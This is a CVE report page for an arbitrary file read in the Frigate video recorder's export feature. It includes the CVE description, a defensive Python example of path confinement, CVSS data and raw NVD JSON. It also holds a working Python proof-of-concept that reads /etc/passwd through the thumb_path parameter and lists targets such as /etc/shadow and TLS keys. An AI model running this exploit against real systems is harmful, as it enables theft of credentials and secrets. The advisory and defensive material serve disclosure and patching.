Security Vulnerability Report
CVE-2025-62382 CVSS 7.7 HIGH

CVE-2025-62382

Published: 2025-10-15 18:15:40
Last Modified: 2026-04-15 00:35:42

Description

Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. Prior to 0.16.2, Frigate's export workflow allows an authenticated operator to nominate any filesystem location as the thumbnail source for a video export. Because that path is copied verbatim into the publicly served clips directory, the feature can be abused to read arbitrary files that reside on the host running Frigate. In practice, a low-privilege user with API access can pivot from viewing camera footage to exfiltrating sensitive configuration files, secrets, or user data from the appliance itself. This behavior violates the principle of least privilege for the export subsystem and turns a convenience feature into a direct information disclosure vector, with exploitation hinging on a short race window while the background exporter copies the chosen file into place before cleanup runs. This vulnerability is fixed in 0.16.2.
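To show the defensive side of the flaw described above (CWE-73: a caller-controlled source path copied verbatim into a web-served directory), here is an added example that is not Frigate's own code: the verbatim-copy pattern beside a hardened resolver that confines the thumbnail source to an allowed directory and rejects absolute paths, traversal and symlink escapes. Function names, the allowed-root layout and the sample files are assumptions constructed for the demo.

```python
import os
import shutil
import tempfile
from pathlib import Path

def vulnerable_copy_thumbnail(thumb_path, clips_dir, export_id):
    # Pre-fix shape of the bug (illustrative, not Frigate's source): the
    # caller-supplied path is copied verbatim into the web-served clips dir.
    dest = os.path.join(clips_dir, f"{export_id}_thumb.jpg")
    shutil.copyfile(thumb_path, dest)
    return dest

def resolve_thumbnail_source(thumb_path, allowed_root):
    # Hardened lookup: the value is only a name under allowed_root (leading
    # slashes dropped so an absolute path cannot skip the join) and must
    # resolve, after symlinks, to a regular file strictly inside that root.
    root = os.path.realpath(allowed_root)
    candidate = os.path.realpath(os.path.join(root, thumb_path.lstrip("/")))
    if candidate == root or os.path.commonpath([root, candidate]) != root:
        raise ValueError(f"thumbnail path escapes allowed root: {thumb_path!r}")
    if not os.path.isfile(candidate):
        raise ValueError(f"thumbnail is not a regular file: {thumb_path!r}")
    return candidate

def demo():
    # Constructed sandbox: an allowed thumbnail dir, a "secret" file outside
    # it, and a symlink inside the allowed dir that points at the secret.
    base = tempfile.mkdtemp()
    allowed, clips = os.path.join(base, "thumbs"), os.path.join(base, "clips")
    for d in (allowed, clips):
        os.mkdir(d)
    secret = os.path.join(base, "secret.txt")
    Path(secret).write_text("db_password=example\n")
    Path(allowed, "cam1.jpg").write_text("jpeg-bytes")
    os.symlink(secret, os.path.join(allowed, "link.jpg"))
    results = {}
    leaked = vulnerable_copy_thumbnail(secret, clips, "exp1")  # secret now web-served
    results["vulnerable_leaks"] = Path(leaked).read_text().startswith("db_password")
    for name, arg in [("legit", "cam1.jpg"), ("absolute", secret),
                      ("traversal", "../secret.txt"), ("symlink", "link.jpg")]:
        try:
            src = resolve_thumbnail_source(arg, allowed)
            shutil.copyfile(src, os.path.join(clips, f"{name}_thumb.jpg"))
            results[name] = "copied"
        except ValueError:
            results[name] = "rejected"
    shutil.rmtree(base)
    return results
```

Only the legitimate name inside the allowed root is copied; the absolute path, the traversal and the symlink pointing outside the root are all refused before any copy happens.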

CVSS Details

CVSS Score: 7.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Frigate < 0.16.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62382 - Frigate Arbitrary File Read via Export Workflow
# Exploits the lack of path validation in Frigate's export thumbnail feature
# Requires: authenticated operator credentials (low privilege)
import requests
import time

# Configuration
FRIGATE_URL = "http://target-frigate-instance:5000"
USERNAME = "operator"
PASSWORD = "operator_password"

# Step 1: Authenticate to obtain session/token
session = requests.Session()
login_resp = session.post(
    f"{FRIGATE_URL}/api/login",
    json={"user": USERNAME, "password": PASSWORD}
)
token = login_resp.json().get("token")
headers = {"Authorization": f"Bearer {token}"}

# Step 2: Trigger export with arbitrary file path as thumbnail source
# The vulnerable parameter accepts arbitrary filesystem paths
target_file = "/etc/passwd"  # Any file readable by the Frigate process
export_payload = {
    "name": "legitimate_export",
    "thumb_path": target_file,  # Path injected without validation (pre-0.16.2)
    "playback": "preview"
}

# Initiate the export job
export_resp = session.post(
    f"{FRIGATE_URL}/api/export",
    json=export_payload,
    headers=headers
)
export_id = export_resp.json().get("id")
print(f"Export job created: {export_id}")

# Step 3: Race window - access the copied file before cleanup runs
# The file is copied to the publicly served clips directory
time.sleep(0.5)  # Brief delay to allow file copy

# Step 4: Retrieve the exfiltrated file via public URL
clip_url = f"{FRIGATE_URL}/clips/{export_id}/thumb.jpg"
file_content = session.get(clip_url, headers=headers)
print(f"Exfiltrated content of {target_file}:")
print(file_content.text)

# Sensitive targets could include:
# - /etc/shadow, /etc/passwd
# - /config/config.yml (Frigate configuration with credentials)
# - Environment variables / secrets files
# - TLS private keys

References

Commit: https://github.com/blakeblackshear/frigate/commit/d7f7cd7be16bfe7a12766b797da6b8add687ccd9
GitHub Security Advisory: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-8gv4-5jr9-v96j
Weakness: CWE-73 (External Control of File Name or Path)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-62382",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-15T18:15:40.390",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. Prior to 0.16.2, Frigate's export workflow allows an authenticated operator to nominate any filesystem location as the thumbnail source for a video export. Because that path is copied verbatim into the publicly served clips directory, the feature can be abused to read arbitrary files that reside on the host running Frigate. In practice, a low-privilege user with API access can pivot from viewing camera footage to exfiltrating sensitive configuration files, secrets, or user data from the appliance itself. This behavior violates the principle of least privilege for the export subsystem and turns a convenience feature into a direct information disclosure vector, with exploitation hinging on a short race window while the background exporter copies the chosen file into place before cleanup runs. This vulnerability is fixed in 0.16.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
            "baseScore": 7.7,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 4.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-73"}
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/blakeblackshear/frigate/commit/d7f7cd7be16bfe7a12766b797da6b8add687ccd9", "source": "[email protected]"},
      {"url": "https://github.com/blakeblackshear/frigate/security/advisories/GHSA-8gv4-5jr9-v96j", "source": "[email protected]"},
      {"url": "https://github.com/blakeblackshear/frigate/security/advisories/GHSA-8gv4-5jr9-v96j", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}
    ]
  }
}